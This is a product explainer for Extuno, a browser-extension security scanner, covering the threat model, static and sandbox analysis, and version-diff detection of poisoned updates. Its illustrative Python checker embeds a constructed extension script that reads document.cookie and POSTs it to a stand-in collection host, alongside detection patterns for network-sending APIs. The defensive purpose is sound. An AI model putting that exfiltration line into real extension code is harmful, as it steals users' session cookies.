Browser extension security for Chrome and Firefox

Browser extensions run with deep access to the pages you visit, and a single poisoned update can turn a trusted add-on into a data thief. This hub explains the risk model and how Extuno inspects each extension before and after every update.

In short: browser extension security means treating every extension as code that runs with broad permissions, then scanning it statically, dynamically, and across versions so an update-channel compromise is caught before it steals sessions or data.

Why are browser extensions a high-risk attack surface?

An extension is not a static file. It is code that runs inside the browser with permissions the user granted once and rarely revisits: read and modify page content, access cookies, intercept network requests, and run on every site. That access is the point of most extensions, and it is also the prize for an attacker.

The risk is not only the original author. An extension can be sold, the developer account can be phished, or a build dependency can be backdoored. The browser then ships the new version silently. Because the permission grant already happened, the malicious update inherits all of it. This is why Chrome extensions and Firefox add-ons both need monitoring after install, not just at install time.

What does the extension threat model look like?

Concrete abuse patterns recur across incidents. Cookie and session theft reads authentication cookies or storage tokens and forwards them to an attacker endpoint, bypassing passwords and two-factor entirely. Update-channel compromise ships clean code through review, then pushes a poisoned version weeks later. Affiliate and ad fraud rewrites links and injects trackers for revenue. Cryptominers run hidden compute, and proxyware resells the victim's bandwidth.

These map to evidence the analysis can capture: a request to an unexpected host, a header read that grabs a cookie, an injected script tag. The malicious browser extensions page walks through real categories, and the Malicious DB tracks known-bad ids across stores.

How does Extuno scan an extension statically?

Static analysis reads the extension's code and manifest without running it. Extuno applies more than 1100 rules and over 1000 secret detectors across the unpacked source, flagging dangerous permission combinations, credential exfiltration paths, obfuscation, remote-code loading, and hardcoded keys left in the bundle.

Every finding carries evidence: the file, the line, why the pattern is dangerous, and the recommended action. A score with no proof is not acceptable, so the report tells an analyst exactly what to look at. Static checks never execute the code and run fast, which makes them the first pass on every scan. See static analysis for how the rule engine and secret catalog work, and how the same scan feeds a CI gate with SARIF and JSON output.

What does the dynamic sandbox add?

Some behavior only appears at runtime. Extuno runs the extension inside an isolated, network-segmented microVM and watches what it actually does: which endpoints it contacts, what data it sends in each request body, which extension APIs it calls, and what its pages render. Screenshots and captured traffic become part of the finding evidence.

This catches an extension that looks benign in source but reads a cookie and beacons it to a remote host once loaded, or one that decodes and runs code fetched from the network. Because the sandbox is segmented and disposable, live malicious code is observed without risking the host. Read dynamic sandbox for the capture model and how endpoint and payload data is surfaced.

How does version diffing catch supply-chain attacks?

The headline differentiator is comparing versions. Extuno keeps the archived code of each version and diffs the new release against the prior one, raising a band-escalation alert when a benign extension introduces a new exfiltration channel, new obfuscation, new dangerous permission, or a broadened host scope across an update.

This is the signal a one-time install scan cannot give. An extension can pass review, build trust, then weaponize an update. The Cyberhaven 2024 attack is exactly this pattern: a trusted extension poisoned through its publisher account. Continuous re-scan plus the diff means the poisoned version is flagged when it ships, not after the damage. Details on the mechanism are in version-diff detection.
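As an added illustration (not Extuno's code), here is a minimal version-diff check in Python over two constructed versions of a hypothetical extension; it reproduces the shape of the update-channel alert shown later on this page and also applies the broad-host-plus-sensitive-permission profile described in the FAQ. The permission lists, host patterns, bands and rule regexes are assumptions, not the product's rule set.

```python
import re

# Constructed sample: two versions of a hypothetical extension, keyed by file name.
OLD = {"manifest.json": {"version": "2.4.1", "permissions": ["storage"],
                         "host_permissions": ["https://app.example.com/*"]},
       "content.js": "chrome.storage.local.get('theme', t => { document.body.className = t.theme; });"}
NEW = {"manifest.json": {"version": "2.5.0", "permissions": ["storage", "cookies", "webRequest"],
                         "host_permissions": ["<all_urls>"]},
       "content.js": "const c = document.cookie;\n"
                     "fetch('https://collect.example-cdn.net/i', {method: 'POST', body: c});"}

BANDS = ["benign", "suspicious", "dangerous"]            # ordered so index = severity
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}   # assumed patterns
SENSITIVE_PERMS = {"cookies", "webRequest", "scripting", "tabs"}       # assumed list
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")
SEND_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b")

def scripts(ext):
    # Concatenate every non-manifest file so source rules see the whole bundle.
    return "\n".join(src for name, src in ext.items() if name != "manifest.json")

def cookie_to_network(ext):
    # Rule: a document.cookie read in a bundle that also sends network requests.
    src = scripts(ext)
    return "document.cookie" in src and bool(SEND_RE.search(src))

def band(ext):
    # Static band for one version: cookie-to-network is dangerous; broad host scope
    # plus a sensitive permission is the high-risk profile, banded suspicious.
    m = ext["manifest.json"]
    if cookie_to_network(ext):
        return "dangerous"
    if set(m.get("host_permissions", [])) & BROAD_HOSTS and set(m.get("permissions", [])) & SENSITIVE_PERMS:
        return "suspicious"
    return "benign"

def diff_versions(old, new):
    # Findings introduced by `new` relative to `old`, plus whether the band escalated.
    om, nm = old["manifest.json"], new["manifest.json"]
    findings = [f"new permission: {p}"
                for p in sorted(set(nm.get("permissions", [])) - set(om.get("permissions", [])))]
    broadened = (set(nm.get("host_permissions", [])) & BROAD_HOSTS) - set(om.get("host_permissions", []))
    if broadened:
        findings.append("broadened host scope: " + ", ".join(sorted(broadened)))
    new_urls = set(URL_RE.findall(scripts(new))) - set(URL_RE.findall(scripts(old)))
    findings += [f"new endpoint: {u}" for u in sorted(new_urls)]
    if cookie_to_network(new) and not cookie_to_network(old):
        findings.append("reads document.cookie -> request body")
    old_b, new_b = band(old), band(new)
    return {"from": old_b, "to": new_b, "escalated": BANDS.index(new_b) > BANDS.index(old_b),
            "findings": findings}
```

Running `diff_versions(OLD, NEW)` yields a benign-to-dangerous escalation with the new endpoint, the cookie read feeding the request body, the broadened host scope and the two new permissions listed as findings; the same check over two identical versions returns no findings.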

How do static, dynamic, and AI analysis work together?

The three layers cover different blind spots. Static analysis reads code that never runs in the sandbox. Dynamic analysis catches behavior that only appears live. AI code analysis reads the full source, correlates findings across versions, and explains why a pattern is dangerous in plain language; it is advisory and never overrides the evidence-based verdict.

Together they produce a single banded verdict with the evidence behind it. The same engine that scans Chrome and Firefox extensions also covers developer packages, so a team can apply one standard across the code it ships and the extensions it runs. The free browser companion brings this to end users by checking installed extensions against Extuno; see the companion.

Update-channel alert (version diff)
v2.4.1 -> v2.5.0  BAND ESCALATION
+ new endpoint: https://collect.example-cdn.net/i
+ reads document.cookie -> fetch() body
verdict: benign -> dangerous (new exfiltration channel)

Frequently asked questions

Are browser extensions safe if they passed store review?

Review is a point-in-time check. An extension that passes review can be sold or compromised and then push a malicious update through the same channel. That is why Extuno re-scans after every update and diffs versions, rather than trusting the original approval.

What permissions make an extension dangerous?

Broad host access on all sites combined with the ability to read cookies, intercept requests, or run scripts is the high-risk profile. The capability alone is not proof of malice, so Extuno reports the permission combination as evidence and correlates it with runtime behavior before raising the verdict.

Can Extuno catch an extension that only turns malicious later?

Yes. Extuno archives each version and version-diffs new releases against the prior one, raising a band-escalation alert when an update introduces a new exfiltration channel, obfuscation, or permission. This is the supply-chain signal a single install scan cannot provide.

Does the dynamic sandbox put my system at risk?

No. The extension runs inside an isolated, network-segmented, disposable microVM. The sandbox carries no real secrets, so only seeded data can leave, and the host is never in the same trust boundary as the analyzed code.

How do I check the extensions I already have installed?

Install the free browser companion. It checks your installed Chrome and Firefox extensions against Extuno and flags malicious or dangerous ones, and can request a deep scan of an unknown extension.